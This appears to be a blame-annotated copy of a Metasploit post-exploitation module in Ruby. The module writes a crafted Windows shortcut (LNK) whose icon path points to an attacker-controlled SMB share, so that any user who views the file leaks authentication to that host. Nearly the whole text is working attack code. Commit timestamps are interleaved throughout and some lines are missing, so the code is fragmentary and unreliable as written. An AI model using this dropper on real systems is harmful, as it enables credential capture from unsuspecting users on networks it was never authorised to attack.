2012-02-16 18:34:19 +00:00
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-02-16 18:34:19 +00:00
require 'msf/core'
require 'rex'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
2012-02-16 18:34:19 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Escalate SMB Icon LNK Dropper',
'Description' => %q{
This module drops a shortcut (LNK file) that has a ICON reference
existing on the specified remote host, causing SMB and WebDAV
connections to be initiated from any user that views the shortcut.
'License' => MSF_LICENSE,
'Author' => [ 'mubix' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
OptString.new("LNKFILENAME", [ true, "Shortcut's filename", "Words.lnk"]),
OptString.new("SHARENAME", [ true, "Share name on LHOST", "share1"]),
OptString.new("ICONFILENAME", [ true, "File name on LHOST's share", "icon.png"])
], self.class)
2012-02-16 18:34:19 +00:00
2013-08-30 21:28:54 +00:00
def run
print_status "Creating evil LNK"
lnk = ""
lnk << "\x4c\x00\x00\x00" #Header size
lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" #Link CLSID
lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
lnk << "\xdb\x00\x00\x00" #Link flags
lnk << "\x20\x00\x00\x00" #File attributes
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" #Creation time
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" #Access time
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" #Write time
lnk << "\x00\x00\x00\x00" #File size
lnk << "\x00\x00\x00\x00" #Icon index
lnk << "\x01\x00\x00\x00" #Show command
lnk << "\x00\x00" #Hotkey
lnk << "\x00\x00" #Reserved
lnk << "\x00\x00\x00\x00" #Reserved
lnk << "\x00\x00\x00\x00" #Reserved
lnk << "\x7b\x00" #IDListSize
lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
lnk << "C:\\"
lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
lnk << "\x00"
lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
lnk << "\x5b\x15\x14\x00\x00\x00"
lnk << Rex::Text.to_unicode("AUTOEXEC.BAT")
lnk << "\x00\x00\x1c\x00\x00\x00"
lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
lnk << "\x00\x00\x00"
lnk << "C:\\AUTOEXEC.BAT"
lnk << "\x00\x00\x0e\x00"
lnk << Rex::Text.to_unicode(".\\AUTOEXEC.BAT")
lnk << "\x03\x00"
lnk << Rex::Text.to_unicode("C:\\")
lnk << "\x1c\x00"
lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")
lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
lnk << "computer"
lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"
2012-02-17 03:58:12 +00:00
2013-08-30 21:28:54 +00:00
print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
print_status "Done. Wait for evil to happen.."
2012-02-27 22:21:36 +00:00